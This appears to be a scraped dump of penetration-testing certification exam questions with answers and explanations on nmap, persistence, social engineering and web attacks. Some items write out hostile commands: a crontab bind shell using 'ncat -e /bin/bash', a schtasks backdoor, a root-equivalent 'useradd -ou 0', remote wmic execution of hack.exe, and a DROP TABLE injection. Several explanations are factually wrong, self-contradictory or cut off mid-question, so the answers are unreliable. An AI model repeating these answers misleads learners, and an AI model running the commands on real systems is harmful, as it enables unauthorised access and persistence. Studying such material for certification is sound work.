C. Create a script in the Lua language and use it with NSE. The scenario presented requires a specific sequence of actions: establishing a full TCP connection, sending a specific payload, waiting for a response, and then sending another specific string. This custom behavior is unlikely to be covered by generic vulnerability scanning tools or scripts. The best approach to achieve this specific goal would be to create a custom script that implements the required behavior. Nmap's NSE (Nmap Scripting Engine) is designed to allow users to write scripts for specialized network discovery and vulnerability detection tasks, and it uses Lua as its scripting language.
During a penetration test, a tester is able to change values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application. Which of the following vulnerabilities has the penetration tester exploited? A. Command injection B. Broken authentication C. Direct object reference D. Cross-site scripting
C. Direct object reference During a penetration test, a tester is able to change values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application. This is an example of a direct object reference vulnerability. A direct object reference vulnerability occurs when an application exposes an object's direct reference, such as a file or database record, in the application's user interface. This allows an attacker to access or manipulate objects directly by manipulating the URL or other parameters, bypassing any intended access controls. In this case, the tester was able to gain access to a web application by manipulating the value of the "id" parameter in the URL. It is important to note that options A, B, and D are also potential vulnerabilities that can be identified during a penetration test, but they are not as likely to be identified based on the given scenario as a direct object reference vulnerability. Command injection, Broken authentication, and Cross-site scripting are also common vulnerabilities that can be identified during a penetration test, but they are not related to the scenario where the tester is able to change values in the URL and gain access to a web application.
A penetration tester discovered a vulnerability that provides the ability to upload to a path via discovery traversal. Some of the files that were discovered through this vulnerability are: https://xx.xx.xx.x/vpn/../vpns/portal/scripts/newbm.p1 https://xx.xx.xx.x/vpn/../vpns//cfg/smb.conf Which of the following is the BEST method to help an attacker gain internal access to the affected machine? A. Edit the discovered file with one line of code for remote callback. Most Voted B. Download .pl files and look for usernames and passwords. C. Edit the smb.conf file and upload it to the server. Most Voted D. Download the smb.conf file and look at configurations.
C. Edit the smb.conf file and upload it to the server. The URLs discovered by the penetration tester shows that the vulnerability allows an attacker to upload files to the path by using directory traversal. By editing the smb.conf file (smb is short for Server Message Block, a protocol for sharing files, printers, serial ports, and communications abstractions such as named pipes and mail slots between computers) and uploading it to the server, an attacker can modify the configurations of the SMB service and potentially gain internal access to the affected machine. Option A is not the best method because it would only allow the attacker to remotely callback and it doesn't provide internal access. Option B is not the best method because the files are scripts and they are unlikely to contain usernames and passwords. Option D is not the best method because it would only allow the attacker to see the configurations of the SMB service, it doesn't provide internal access.
A security firm has been hired to perform an external penetration test against a company. The only information the firm received was the company name. Which of the following passive reconnaissance approaches would be MOST likely to yield positive initial results? A. Specially craft and deploy phishing emails to key company leaders. B. Run a vulnerability scan against the company's external website. C. Runtime the company's vendor/supply chain. D. Scrape web presences and social-networking sites.
D is the most likely to yield positive initial results. Scraping web presences and social-networking sites can provide information about a company such as its address, size, services, customer reviews, and contact information. This can be useful when starting a penetration test Option A is incorrect because phishing emails are not a good approach for initial information gathering. Phishing emails are used to gain access to a company's internal systems and data, but they are not an effective way to gather information about a company's external presence. Option B is incorrect because running a vulnerability scan against the company's external website is not a passive approach. Vulnerability scans involve actively probing a system and are better suited for internal penetration tests. Option C is incorrect because running the company's vendor/supply chain is not a passive approach. This approach could potentially yield some information, but it is not the most effective way to gather initial information.
A penetration tester is scanning a corporate lab network for potentially vulnerable services.Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker? A. nmap 192.168.1.1-5 -PU22-25,80 B. nmap 192.168.1.1-5 -PA22-25,80 C. nmap 192.168.1.1-5 -PS22-25,80 D. nmap 192.168.1.1-5 -Ss22-25,80
D is the only answer that doesnt actually RUN so I dont see why that's the majority answer. Looking at nmap --help clearly shows: -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports We want TCP, so -PS will do the job. OR The correct answer is D. nmap 192.168.1.1-5 -Ss22-25,80. This command will perform a SYN scan of ports 22 through 25 and port 80 on the IP addresses 192.168.1.1 through 192.168.1.5. This scan will return any potentially vulnerable ports that might be of interest to an attacker. The capital 'S' stands for the SYN flag, which is used to initiate a connection on a TCP port. The lowercase 's' stands for the stealth flag, which is used to hide the source IP address of the scan and make it harder to detect.
Which of the following is MOST important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience? A. Executive summary of the penetration-testing methods used B. Bill of materials including supplies, subcontracts, and costs incurred during assessment C. Quantitative impact assessments given a successful software compromise D. Code context for instances of unsafe typecasting operations
D. Code context for instances of unsafe typecasting operations A static application-security test is a method of evaluating the security of an application's source code without executing it. The final report of such a test should be written for the intended audience, in this case, it's a team of application developers. The most important information that should be included in the final report is the details of the vulnerabilities found, and how to fix them. This includes providing the code context for instances of unsafe typecasting operations, that is, providing the specific lines of code where the vulnerabilities were found, and describing the specific issue that needs to be addressed. An executive summary of the penetration-testing methods used, bill of materials including supplies, subcontracts, and costs incurred during assessment, and quantitative impact assessments given a successful software compromise are important information, but they are not as relevant as providing the code context and specific recommendations on how to fix the vulnerabilities found.
A penetration tester who is working remotely is conducting a penetration test using a wireless connection. Which of the following is the BEST way to provide confidentiality for the client while using this connection? A. Configure wireless access to use a AAA server. B. Use random MAC addresses on the penetration testing distribution. C. Install a host-based firewall on the penetration testing distribution. D. Connect to the penetration testing company's VPS using a VPN.
D. Connect to the penetration testing company's VPS using a VPN would be the best way to provide confidentiality for the client while using this connection. A virtual private network (VPN) allows the penetration tester to securely and privately connect to the remote network over the internet, encrypting all data transmitted between the two points. This ensures that the data remains confidential, even when being transmitted over the wireless connection.
A penetration tester is conducting an authorized, physical penetration test to attempt to enter a client's building during non-business hours. Which of the following are MOST important for the penetration tester to have during the test? (Choose two.) A. A handheld RF spectrum analyzer B. A mask and personal protective equipment C. Caution tape for marking off insecure areas D. A dedicated point of contact at the client E. The paperwork documenting the engagement F. Knowledge of the building's normal business hours
In an authorized physical penetration test of a client's building, especially during non-business hours, it's essential to have clear communication and proper documentation. Among the options provided, the following two are MOST important for the penetration tester to have during the test: D. A dedicated point of contact at the client - Having someone to communicate with at the client's end can be essential in case of any unexpected issues, questions, or if immediate authorization or clarification is needed. E. The paperwork documenting the engagement - This is crucial to have on hand in case of any interactions with security, law enforcement, or other individuals who might question the legitimacy of the penetration test. The paperwork should detail the scope, authorization, and other key aspects of the engagement. The other options might be useful in specific scenarios but are not generally the most important aspects for a physical penetration test in a client's building during non-business hours.
A penetration tester is contracted to attack an oil rig network to look for vulnerabilities. While conducting the assessment, the support organization of the rig reported issues connecting to corporate applications and upstream services for data acquisitions. Which of the following is the MOST likely culprit? A. Patch installations B. Successful exploits C. Application failures D. Bandwidth limitations
In the context of a penetration test being performed on an oil rig network, and considering the symptoms reported (issues connecting to corporate applications and upstream services for data acquisitions), the MOST likely culprit would be: B. Successful exploits Explanation: Penetration testing is an activity where security professionals actively try to exploit vulnerabilities in a system to identify weaknesses. If the penetration tester has successfully exploited vulnerabilities within the network, this could lead to disruption in connectivity and access to applications and services, which aligns with the reported issues. Other options don't align as closely with the scenario. It states during the testing it occurred. It doesn't indicate to mean that exploited anything. Both ingress and egress traffic were affected which means to me that bandwidth was an issue.
A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position.Which of the following actions, if performed, would be ethical within the scope of the assessment? A. Exploiting a configuration weakness in the SQL database B. Intercepting outbound TLS traffic C. Gaining access to hosts by injecting malware into the enterprise-wide update server D. Leveraging a vulnerability on the internal CA to issue fraudulent client certificates E. Establishing and maintaining persistence on the domain controller
In the context of a penetration test, the ethical actions are those that fall within the scope and rules of engagement agreed upon with the client. Since the scenario describes that the assessment is scoped to try to gain access to the human resources server housing PII and salary data, the actions that are relevant to this goal and don't unnecessarily escalate privileges or create undue risks would be considered ethical. A. Exploiting a configuration weakness in the SQL database - This option aligns with the goal of trying to gain access to the specific server mentioned in the scenario. Since SQL databases might be involved in storing PII and salary data, exploiting a configuration weakness in the SQL database could be within the scope of the assessment.
A penetration tester will be performing a vulnerability scan as part of the penetration test on a client's website. The tester plans to run several Nmap scripts that probe for vulnerabilities while avoiding detection. Which of the following Nmap options will the penetration tester MOST likely utilize? A. -а8 -T0 B. --script "http*vuln*" C. -sn D. -O -A
In the context of performing a vulnerability scan with Nmap, particularly for probing for web vulnerabilities, option B would be the most appropriate choice. The other options don't directly relate to probing for web vulnerabilities or avoiding detection in the context provided: Option A, "-а8 -T0", sets the timing template to paranoid and sends packets with minimum delay, which may slow down the network or cause the scan to fail if the target is rate-limited or IDS/IPS is triggered. Option B, "--script "httpvuln"", allows the tester to run Nmap scripts that probe for vulnerabilities specific to the HTTP protocol. This is a targeted approach to scanning for vulnerabilities and helps to avoid detection by using only the relevant scripts. Option C, "-sn", is used for a ping scan to determine which hosts are up on a network. This option is not relevant for vulnerability scanning. Option D, "-O -A", performs operating system and service version detection, which may be useful for recon
A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test.Which of the following describes the scope of the assessment? A. Partially known environment testing B. Known environment testing C. Unknown environment testing D. Physical environment testing
In the scenario described, the penetration tester only has access to publicly available information about the target company, meaning the internal details of the environment are not known to the tester prior to the assessment. This represents a situation where the penetration tester is working with limited or no specific knowledge of the internal layout and technologies used within the target environment. Therefore, the correct answer to this question is: C. Unknown environment testing.
A security firm is discussing the results of a penetration test with the client. Based on the findings, the client wants to focus the remaining time on a critical network segment. Which of the following BEST describes the action taking place? A. Maximizing the likelihood of finding vulnerabilities B. Reprioritizing the goals/objectives C. Eliminating the potential for false positives D. Reducing the risk to the client environment
The action of shifting the focus of a penetration test to a specific critical network segment based on the findings during the engagement best aligns with B. Reprioritizing the goals/objectives. because as the client is choosing to change the focus of the testing to a particular area based on the findings. It reflects an adjustment of the original plan or goals to better suit the current understanding of the system's security posture.
SIMULATION -You are a penetration tester reviewing a client's website through a web browser. INSTRUCTIONS -Review all components of the website through the browser to determine if vulnerabilities are present.Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Step 1: Generate Certificate Signing Request Step 2: Submit CSR to the CA - Step 3: Remove certificate from the server Step 4: Install re-issued certificate on the serve Generate a Certificate Signing Request (CSR): This step is the first step in the process of obtaining a new certificate. The CSR is a file that contains information about the website and the organization that operates it, as well as a public key. This file is then sent to a Certificate Authority (CA) to request a new certificate. Submit CSR to the CA: Once the CSR is generated, it is sent to the chosen CA. The CA will then validate the information in the CSR and issue a new certificate. Install re-issued certificate on the server: Once the new certificate is issued, it needs to be installed on the server. This step ensures that the new certificate is properly configured and can be used to secure the website. Remove certificate from server: After the new certificate is installed, the old certificate needs to be removed from the server to avoid any confusion or security issues.
A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop.Which of the following can be used to ensure the tester is able to maintain access to the system? A. schtasks /create /sc /ONSTART /tr C:\Temp|WindowsUpdate.exe B. wmic startup get caption,command C. crontab -l; echo ג€@reboot sleep 200 && ncat -lvp 4242 -e /bin/bashג€) | crontab 2>/dev/null D. sudo useradd -ou 0 -g 0 user
The "schtasks" command is used to manage scheduled tasks in Windows. By creating a new scheduled task with the "/sc ONSTART" option, the task will be triggered when the system starts up, ensuring persistence. The "/tr" option is used to specify the command or program to be executed by the scheduled task. In this case, the command "C:\Temp\WindowsUpdate.exe" is specified. The tester can replace this with a backdoor or a malicious payload that allows them to maintain access to the compromised system.
Which of the following BEST explains why a penetration tester cannot scan a server that was previously scanned successfully? A. The IP address is wrong. B. The server is unreachable. C. The IP address is on the blocklist. D. The IP address is on the allow list.
The BEST explanation for why a penetration tester cannot scan a server that was previously scanned successfully is that the IP address is on the blocklist. Blocklists are used by firewalls and other security measures to restrict access to certain IP addresses or ranges of IP addresses. If an IP address is on the blocklist, it will not be able to be scanned by a penetration tester.
A company has recruited a penetration tester to conduct a vulnerability scan over the network. The test is confirmed to be on a known environment. Which of the following would be the BEST option to identify a system properly prior to performing the assessment? A. Asset inventory B. DNS records C. Web-application scan D. Full scan
The BEST option to identify a system properly prior to performing the assessment is A. Asset inventory. An asset inventory is a comprehensive listing of all of the information technology assets that a company owns or uses. This includes hardware, software, databases, networks, and other important systems. It is important to know what assets a company has so that a vulnerability scan can be properly tailored to identify the correct systems and their associated vulnerabilities. B. DNS records is incorrect because DNS records do not provide information on what systems are in the environment, only the domain name associated with the environment. C. Web-application scan is incorrect because a web-application scan does not provide information on what systems are in the environment, only the web applications associated with the environment. D. Full scan is incorrect because a full scan will not provide information on what systems are in the environment, only any potential vulnerabilities that may exist.
You were able to successfully compromise user-level access o a bastion host (BH1) on the ABC network, using lateral movement. The server is used to collect log files from hosts on the internal network. The local IPtable rules restrict direct access to the server; however, your team wants you to establish persistence on the box by creating an entry in the user's crontab file that will execute a payload. From the myhost configure drop-down list, select the correct LHOST and LPORT values to use for msvenom to build a payload to call back to your laptop, based on predefenid IPtablerules Myhost: 172.16.8.33
The IPtable rules for BH1 server allows DNS UDP and TCP to the DNS server outside the Intranet network as well as SSH (port 22/tcp) to the 172.16.8.0/24 network, where myhost is currently sitting on the Internet network. Setting LHOST value to point to the IP address for "myhost" and using the LPORT value of 22 will allow the payload execution to succeed, given the configured IPtables ruleset LHOST =172.16.8.33 LPORT=22
The provision that defines the level of responsibility between the penetration tester and the client for preventing unauthorized disclosure is found in the: A. NDA B. SLA C. MSA D. SOW
The NDA is a legal contract that outlines the terms and conditions of the confidentiality agreement between the two parties. It specifies what information is considered confidential and how it can be used or shared, and the responsibilities of both parties to prevent unauthorized disclosure.
PCI DSS requires which of the following as part of the penetration-testing process? A. The penetration tester must have cybersecurity certifications. B. The network must be segmented. C. Only externally facing systems should be tested. D. The assessment must be performed during non-working hours.
The Payment Card Industry Data Security Standard (PCI DSS) outlines various requirements for protecting cardholder data. Among the options listed, the one that aligns with PCI DSS as part of the penetration-testing process is: B. The network must be segmented. Explanation: Option B: Network segmentation is a common practice to isolate different parts of the network and minimize the risk of unauthorized access to sensitive areas, such as those that handle cardholder data. PCI DSS requires network segmentation as a way to reduce the scope of the PCI environment, making it easier to secure and comply with the standard.
Which of the following factors would a penetration tester MOST likely consider when testing at a location? A. Determine if visas are required. B. Ensure all testers can access all sites. C. Verify the tools being used are legal for use at all sites. D. Establish the time of the day when a test can occur.
The answer is C. Verify the tools being used are legal for use at all sites.
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running.Which of the following would BEST support this task? A. Run nmap with the -O, -p22, and -sC options set against the target. B. Run nmap with the -sV and -p22 options set against the target. C. Run nmap with the --script vulners option set against the target. D. Run nmap with the -sA option set against the target.
The correct answer is C. Run nmap with the --script vulners option set against the target. The --script vulners option will scan the target for vulnerabilities associated with Common Vulnerabilities and Exposures (CVEs). It can be used to identify potential CVEs that can be leveraged to gain execution on the Linux server. Example: nmap --script vulners -p 22 10.1.1.1 The other choices are incorrect because they do not include the --script vulners option which is necessary to identify CVEs. Option A includes the -O and -sC options which can be used to identify the operating system and services running on the target, however, it does not include the --script vulners option. Option B includes the -sV and -p22 options which can be used to identify the service versions running on the target and the port number, however, it does not include the --script vulner option. Option D includes the -sA option which can be used to perform an ACK scan, however, it does not include the --script vulners option.
A penetration tester is testing a new API for the company's existing services and is preparing the following script: #!/bin/bash for each in GET POST PUT TRACE CONNECT OPTIONS; do printf "Seach/ HTTP/1.1\nHost: www.comptia.org\r\n\r\n" Inc www.comptia.org 80 Which of the following would the test discover? A. Default web configurations B. Open web ports on a host C. Supported HTTP methods D. Listening web servers in a domain
The correct answer is C. Supported HTTP methods. The script is making a request for each of the specified HTTP methods (GET, POST, PUT, TRACE, CONNECT, OPTIONS). The script is testing to see which of these methods are supported by the API. This would allow the penetration tester to determine which methods are available for use when interacting with the API.
A penetration tester needs to upload the results of a port scan to a centralized security tool. Which of the following commands would allow the tester to save the results in an interchangeable format? A. nmap -iL results 192.168.0.10-100 B. nmap 192.168.0.10-100 -O > results C. nmap -A 192.168.0.10-100 -oX results D. nmap 192.168.0.10-100 | grep "results"
The correct answer is C. nmap -A 192.168.0.10-100 -oX results. Option C is correct because the -A option is used to enable OS and version detection, as well as enabling script scanning and traceroute. The -oX option allows the tester to save the results in an XML format, which is an interchangeable format. Option A is incorrect because the -iL option is used to read a list of targets in a text file. It does not allow for the saving of results in an interchangeable format. Option B is incorrect because the -O option is used to enable operating system detection. It does not allow for the saving of results in an interchangeable format. Option D is incorrect because the grep command is used to search files for a specific pattern of characters. It does not allow for the saving of results in an interchangeable format.
A Chief Information Security Officer wants to evaluate the security of the company's e-commerce application. Which of the following tools should a penetration tester use FIRST to obtain relevant information from the application without triggering alarms? A. SQLmap B. DirBuster C. w3af D. OWASP ZAP
The correct answer is D. OWASP ZAP. OWASP ZAP (Open Web Application Security Project Zed Attack Proxy) is a free and open source web application security scanner designed to help security professionals identify security vulnerabilities in web applications. It can be used to identify potential weaknesses and vulnerabilities, such as SQL injection, cross-site scripting, and other security issues. It also provides a way for penetration testers to obtain information about the application without triggering alarms or other security measures. A. SQLmap is an open source tool used for detecting and exploiting SQL injection vulnerabilities. While it can be used to help identify security flaws in a web application, it is not the best tool for the task. B. DirBuster is a web application brute force tool used to discover hidden files and directories on a web server. It is not the best tool for evaluating the security of an e-commerce application, as it does not provide relevant information a
Given the following code: systems = { "10.10.10.1" : "Windows 10", "10.10.10.2" : "Windows 10", "10.10.10.3" : "Windows 2016", "10.10.10.4" : "Linux" }
The data structure in the given code is a dictionary, which maps IP addresses to operating system names. The syntax for creating a dictionary in Python is using curly braces {} and separating keys and values with colons (:), and separating items with commas (,). Therefore, the correct answer is: D. A dictionary An example of a dictionary is a collection of key-value pairs, such as {'one':1, 'two':2, 'three':3}. An example of an array is a collection of elements stored in sequential order, such as [1, 2, 3]. An example of a tree is a hierarchical structure composed of nodes, such as the family tree. An example of a tuple is a fixed-length sequence of elements, such as (1, 2, 3).
A penetration tester created the following script to use in an engagement: However, the tester is receiving the following error when trying to run the script:Which of the following is the reason for the error? #!/usr/bin/python import socket ports [21,22,23,25,80,139,443,445, 3306,3389] if len(sys.argv) == 2: else: target = socket.gethostbyname (sys.argv[1]) print ("Few arguments.") print ("Syntax: python {} <>". format (sys.argv[0])) sys.exit() try: for port in ports: s = socket.socket (soc
The error message "NameError: name 'sys' is not defined" suggests that the script is trying to use the sys module, but it hasn't been properly imported or defined. Therefore, option C - "The sys module was not imported" - is the correct answer.
A penetration tester calls an IT employee and pretends to be the financial director of the company. The penetration tester asks the IT employee to reset the financial director's email password. The penetration tester claims to be at an ongoing, off-site meeting with some investors and needs a presentation file quickly downloaded from the director's mailbox. Which of following techniques is the penetration tester trying to utilize? (Choose two.) A. Scarcity B. Intimidation C. Authority D. Conse
The penetration tester is trying to utilize the following two techniques: C. Authority - The penetration tester is pretending to be the financial director of the company, and is using the authority associated with that role to convince the IT employee to reset the email password. E. Urgency - The penetration tester is claiming to be in an ongoing, off-site meeting with investors, and needs the presentation file downloaded quickly. This creates a sense of urgency and pressure on the IT employee to act quickly, without taking the necessary precautions.
A consultant is reviewing the following output after reports of intermittent connectivity issues: ? (192.168.1.1) at 0a: d1: fa:b1:01:67 on en0 ifscope [ethernet] ? (192.168.1.12) at 34: a4:be:09:44: f4 on en0 ifscope [ethernet] ? (192.168.1.17) at 92:60:29:12:ac: d2 on en0 ifscope [ethernet] ? (192.168.1.34) at 88: de: a9:12:oe: fb on en0 ifscope [ethernet] ? (192.168.1.136) at 0a: d1: fa:b1:01:67 on en0 ifscope [ethernet] ? (224.0.0.251) at 01:02:5e:7f:ff:fa on en0 ifscope permanent [ethernet] ? (239.255.255.250) at ff:ff:ff:ff:ff:ff on en0 ifscope permanent [ethernet] Which of the following is MOST likely to be reported by the consultant? A. A device on the network has an IP address in the wrong subnet. B. A multicast session was initiated using the wrong multicast group. C. An ARP flooding attack is using the broadcast address to perform DDoS. D. A device on the network has poisoned the ARP cache.
The fact that there are multiple entries for the same MAC address (0a:d1:fa:b1:01:67) indicates that there is an issue with the ARP cache. Specifically, it appears that one device (with MAC address 0a:d1:fa:b1:01:67) is claiming to be multiple IP addresses on the network (192.168.1.1 and 192.168.1.136). This is an example of ARP cache poisoning, where a device sends fake ARP messages in order to associate its own MAC address with the IP address of another device on the network.
After gaining access to a Linux system with a non-privileged account, a penetration tester identifies the following file: -rwxrwxrwx 1 root root 915 Mar 6 2020 /scripts/daily_log_backup.sh Which of the following actions should the tester perform FIRST? A. Change the file permissions. B. Use privilege escalation. C. Cover tracks. D. Start a reverse shell.
The file .scripts/daily_log_backup.sh has permissions set to 777, meaning that anyone can read, write, or execute the file. Since it's owned by the root user and the penetration tester has access to the system with a non-privileged account, this could be a potential avenue for privilege escalation. In a penetration test, after finding such a file, the tester would likely want to explore it and see if it can be leveraged to gain higher privileges. This is often done by inserting malicious code or commands into the script if it's being executed with higher privileges, such as root in this case.
A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible. Which of the following Nmap scan syntaxes would BEST accomplish this objective? A. nmap ג€"sT ג€"vvv ג€"O 192.168.1.0/24 ג€"PO B. nmap ג€"sV 192.168.1.0/24 ג€"PO C. nmap ג€"sA ג€"v ג€"O 192.168.1.0/24 D. nmap ג€"sS ג€"O 192.168.1.0/24 ג€"T1
The goal here is to conduct a scan that triggers as few alarms and countermeasures as possible, so a stealthier approach is needed. Among the options provided, the command that would best accomplish this goal is: D. `nmap -sS -O 192.168.1.0/24 -T1` Here's why: - `-sS`: This flag triggers a SYN scan, also known as a stealth scan, which is less likely to be detected by intrusion detection systems since it doesn't complete the TCP three-way handshake. - ` -O`: This enables OS detection, which can be valuable information in a penetration test. - `-T1`: This sets the scan timing to the slowest level, further reducing the chance of detection. Other options, such as `-sT` for a full TCP connect scan (option A) or `-sV` for service version detection (option B), or even `-sA` for an ACK scan (option C), may be more easily detected by security systems or are more aggressive in nature. So, option D would be the best choice for a more covert approach.
In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: . Which of the following would be the best action for the tester to take NEXT with this information? A. Create a custom password dictionary as preparation for password spray testing. B
The immediate concern here is that the penetration tester has found sensitive information, including usernames and passwords, stored in cleartext in an unprotected location. Before moving on to any kind of additional testing or exploitation, the priority should be to address this significant security risk. Among the options provided, the best next step would be: B. Recommend using a password manager/vault instead of text files to store passwords securely. This recommendation directly addresses the vulnerability that has been discovered and offers a practical solution to enhance security. It focuses on ensuring that the sensitive data is properly protected, rather than immediately moving forward with further penetration testing activities.
A penetration tester was able to compromise a web server and move laterally into a Linux web server. The tester now wants to determine the identity of the last user who signed in to the web server. Which of the following log files will show this activity? A. /var/log/messages B. /var/log/last_user C. /var/log/user_log D. /var/log/lastlog
The lastlog file contains information about the last login sessions of users on the system. It records the time and date of the last login, as well as the terminal or source IP address from which the user logged in. The lastlog file is usually only accessible to the root user, but a penetration tester who has gained root access to the system should be able to read it.
A penetration tester conducted an assessment on a web server. The logs from this session show the following: http://www.thecompanydomain.com/servicestatus.php?serviceID=892&serviceID=892 DROP TABLE SERVICES; Which of the following attacks is being attempted? A. Clickjacking B. Session hijacking C. Parameter pollution D. Cookie hijacking E. Cross-site scripting
The logs shows that the attacker is attempting to pollute the "serviceID" parameter by providing multiple values for the same parameter in the request. This can cause the server to behave in unexpected ways, potentially leading to security issues such as SQL injection, in this case, the attacker is attempting to add a "DROP TABLE SERVICES" statement to the query being sent to the server in an attempt to delete the services table.
A client would like to have a penetration test performed that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks. Which of the following methodologies should be used to BEST meet the client's expectations? A. OWASP Top 10 B. MITRE ATT&CK framework C. NIST Cybersecurity Framework D. The Diamond Model of Intrusion Analysis
The methodology that would BEST meet the client's expectations for a penetration test that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks is the MITRE ATT&CK framework. In contrast, the OWASP Top 10 focuses specifically on web application security, while the NIST Cybersecurity Framework provides high-level guidance for improving overall cybersecurity posture. The Diamond Model of Intrusion Analysis is a methodology for analyzing and understanding cyber threats and is not specifically designed for penetration testing.
A penetration tester was brute forcing an internal web server and ran a command that produced the following output: http://172.16.100.10:3000/ftp (CODE:200) http://172.16.100.10:3000/profile (CODE: 500) http://172.16.100.10:3000/promotion (CODE: 200) However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed.Which of the following is the MOST likely reason for the lack of output? A. The HTTP port is not open on the firewall. B. The tester did not run sudo before the command. C. The web server is using HTTPS instead of HTTP. D. This URI returned a server error.
The most likely reason for the lack of output is D. This UR(L) returned a server error. This is because the output of the dirb command shows that the profile URL responded with an HTTP Status Code 500, which indicates that the web server experienced an internal server error when the request was received. This could be caused by a number of things, such as a misconfigured server or a syntax error in the code. A is incorrect because the output of the dirb command indicates that the HTTP port is open. B is incorrect because the output indicates that the command was run without sudo and still produced a response. C is incorrect because the output of the dirb command indicates that the web server is using HTTP, not HTTPS.
Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement? A. Acceptance by the client and sign-off on the final report B. Scheduling of follow-up actions and retesting C. Attestation of findings and delivery of the report D. Review of the lessons during the engagement
The next step in the engagement after reviewing the initial findings with the client would typically be the acceptance by the client and sign-off on the final report (option A). After the client has reviewed and accepted the final report, the next step could be scheduling follow-up actions and retesting (option B) to ensure that any vulnerabilities or weaknesses identified during the penetration testing have been properly addressed and mitigated. Option C, attestation of findings and delivery of the report, may also be a necessary step depending on the specific requirements of the engagement. Option D, review of the lessons during the engagement, could also be an important step to ensure that the insights and lessons learned during the engagement are properly documented and shared with relevant stakeholders.
During a web application test, a penetration tester was able to navigate to https://company.com and view all links on the web page. After manually reviewing the pages, the tester used a web scanner to automate the search for vulnerabilities. When returning to the web application, the following message appeared in the browser: unauthorized to view this page. Which of the following BEST explains what occurred? A. The SSL certificates were invalid. B. The tester IP was blocked. C. The scanner cra
The only logical explanation. The tester's IP was most likely blocked—possibly automatically so—due to generating excessive traffic from their reconnaissance. A is incorrect. If it were attributable to an expired certificate, the user would've received an explicit warning. You can rule out C because the system was clearly operational enough to display that message. It can't be D, either, because the tester was able to find it initially. Plus, you'd receive a 404 error if that were the case.
Within a Python script, a line that states print (var) outputs the following: [{'1' : 'CentOS', '2' : 'Ubuntu'}, {'1' : 'Windows 10', '2' : 'Windows Server 2016'}] Which of the following objects or data structures is var? A. An array B. A class C. A dictionary D. A list
The output of print(var) is a list of two dictionaries. The first dictionary has keys '1' and '2', and their corresponding values are 'CentOS' and 'Ubuntu', respectively. The second dictionary has keys '1' and '2', and their corresponding values are 'Windows 10' and 'Windows Server 2016', respectively. Therefore, the correct answer is D. A list.
The following output is from reconnaissance on a public-facing banking website: Based on these results, which of the following attacks is MOST likely to succeed? A. A birthday attack on 64-bit ciphers (Sweet32) B. An attack that breaks RC4 encryption C. An attack on a session ticket extension (Ticketbleed) D. A Heartbleed attack
The output shows that the server offers LOW: 64 Bit + DES, RC(2,4) (w/o export) ciphers which is not okay as they are considered weak. RC4 is a stream cipher that has known vulnerabilities and has been deprecated by the industry due to its security weaknesses. If the attacker can break RC4 encryption, they can potentially intercept and view the sensitive information transmitted between the client and the server. Therefore, an attack that breaks RC4 encryption is the most likely to succeed.
A penetration tester gains access to a system and is able to migrate to a user process: net use S: \\192.168.5.51\C$\temp /persistent no copy c:\temp\hack.exe S:\temp\hack.exe wmic.exe /node: '192.168.5.51" process call create "C:\temp\hack.exe" Given the output above, which of the following actions is the penetration tester performing? (Choose two.) A. Redirecting output from a file to a remote system B. Building a scheduled task for execution C. Mapping a share to a remote system D. Executing a file on the remote system E. Creating a new process on all domain systems F. Setting up a reverse shell from a remote system G. Adding an additional IP address on the compromised system
The penetration tester is performing the following actions: C. Mapping a share to a remote system D. Executing a file on the remote system The first command, "net use S: \192.168.5.51\C$\temp /persistent no", maps a share on a remote system (IP address 192.168.5.51) to the local system. The second command, "copy c:\temp\hack.exe S:\temp\hack.exe", copies a file (hack.exe) to the mapped share. The third command, "wmic.exe /node: "192.168.5.51" process call create "C:\temp\hack.exe"", creates a new process on the remote system (IP address 192.168.5.51) that runs the file hack.exe. A. Redirecting output from a file to a remote system: This action is not performed in the given output B. Building a scheduled task for execution: This action is not performed in the given output E. Creating a new process on all domain systems: This action is not performed in the given output F. Setting up a reverse shell from a remote system: This action is not performed in the given output G. Adding an additional IP address on the compromised system: This action is not performed in the given output
During a vulnerability scanning phase, a penetration tester wants to execute an Nmap scan using custom NSE scripts stored in the following folder: /home/user/scripts Which of the following commands should the penetration tester use to perform this scan? A. nmap --resume "not intrusive" B. nmap --script default,safe C. nmap --script /home/user/scripts D. nmap --load /home/user/scripts
nmap has no "--load" option. nmap --script /path/to/directory is correct
What port does a PowerShell PSSession use?
remote Powershell does not use RDP(3389), it uses ports 5985/5986.
A penetration tester learned that when users request password resets, help desk analysts change users' passwords to 123change. The penetration tester decides to brute force an internet-facing webmail to check which users are still using the temporary password. The tester configures the brute-force tool to test usernames found on a text file and the password 123change.Which of the following techniques is the penetration tester using? A. Brute-force attack B. LDAP injection C. Password spraying D
The penetration tester is using password spraying technique. Password spraying is a type of brute-force attack that uses a single password (in this case, 123change) and tries it against multiple usernames. The objective is to identify accounts that are still using the temporary password. Option A (Brute-force attack) is a general term used to describe attacks that involve trying multiple passwords or passphrases with the hope of eventually guessing the correct one. Password spraying is a type of brute-force attack. Option B (LDAP injection) is an attack that exploits vulnerabilities in LDAP (Lightweight Directory Access Protocol) implementations to execute unauthorized queries or commands. This technique is not related to password spraying. Option D (Kerberoasting) is an attack that targets Kerberos authentication protocol to extract service account credentials from Active Directory domain controllers. This technique is not related to password spraying.
